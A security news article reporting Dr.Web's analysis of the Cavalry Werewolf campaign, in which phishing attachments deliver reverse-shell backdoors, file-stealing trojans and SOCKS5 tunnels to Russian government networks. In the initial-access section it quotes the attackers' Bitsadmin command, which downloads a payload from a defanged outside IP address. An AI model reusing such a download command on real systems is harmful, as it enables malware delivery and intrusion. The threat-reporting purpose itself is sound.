In July 2025, a sophisticated hacker group known as Cavalry Werewolf executed a targeted campaign against Russian government institutions, compromising critical infrastructure through coordinated phishing operations.
The discovery of this campaign reveals a complex attack chain designed to establish persistent network access, extract sensitive data, and maintain long-term control over compromised systems.
Dr.Web security analysts identified the group after being contacted by a targeted government organization that detected suspicious email traffic originating from internal corporate accounts, suggesting unauthorized network access.
The investigation uncovered multiple previously unknown malware variants deployed across a multi-stage infection process.
The attackers demonstrated sophisticated operational security practices by leveraging open-source tools, employing encryption, and establishing command-and-control infrastructure across multiple servers.
Their arsenal includes various reverse-shell backdoors, data theft trojans, and process injection techniques that allow remote command execution without triggering traditional security mechanisms.
Dr.Web security researchers noted that this campaign represents a significant escalation in sophistication, with the group continuously expanding their toolkit to adapt to different target environments.
The attack methodology focuses on deploying backdoors that establish remote shell access, enabling attackers to execute commands and maintain persistence within compromised networks.
This approach provides the flexibility to deploy additional malware stages based on reconnaissance findings within each target organization.
Initial Access and Primary Infection Vector
Cavalry Werewolf initiates attacks through phishing emails containing weaponized attachments masquerading as official government documents.
.webp "Cavalry Werewolf Attacking Government Organizations to Deploy Backdoor For Network Access 3")
The primary infection stage, identified as BackDoor.ShellNET.1, arrives in password-protected archives with deceptive filenames such as administrative reports and internal communications.
Once executed, this reverse-shell backdoor based on Reverse-Shell-CS open-source software enables the attackers to remotely connect to infected systems and execute arbitrary commands.
Following initial compromise, the attackers leverage the legitimate Windows utility Bitsadmin to download additional malicious payloads through remote command execution.
This represents a classic living-off-the-land technique where legitimate system tools become vectors for malware deployment. The command syntax follows this pattern: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/winpot.exe C:userspublicdownloadswinpot.exe.
This particular sequence demonstrates how attackers maintain operational security by using standard Windows mechanisms that typically appear legitimate in network logs.
The subsequent infection stages introduce file theft trojans like Trojan.FileSpyNET.5, capable of exfiltrating documents in common formats including Word files, Excel spreadsheets, PDFs, and image files.
The attackers then deploy BackDoor.Tunnel.41, based on ReverseSocks5 open-source software, which creates SOCKS5 tunnels for inconspicuous remote access and command execution.
This layered approach allows the group to maintain multiple access points within compromised infrastructure, ensuring persistence even if individual backdoors are detected and removed.
The technical sophistication displayed throughout the campaign underscores the evolving threat landscape facing government organizations.
By combining legitimate tools, open-source frameworks, and custom malware modifications, Cavalry Werewolf demonstrates a mature operational capability designed to evade detection while maintaining flexible command-and-control structures suitable for diverse target environments.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
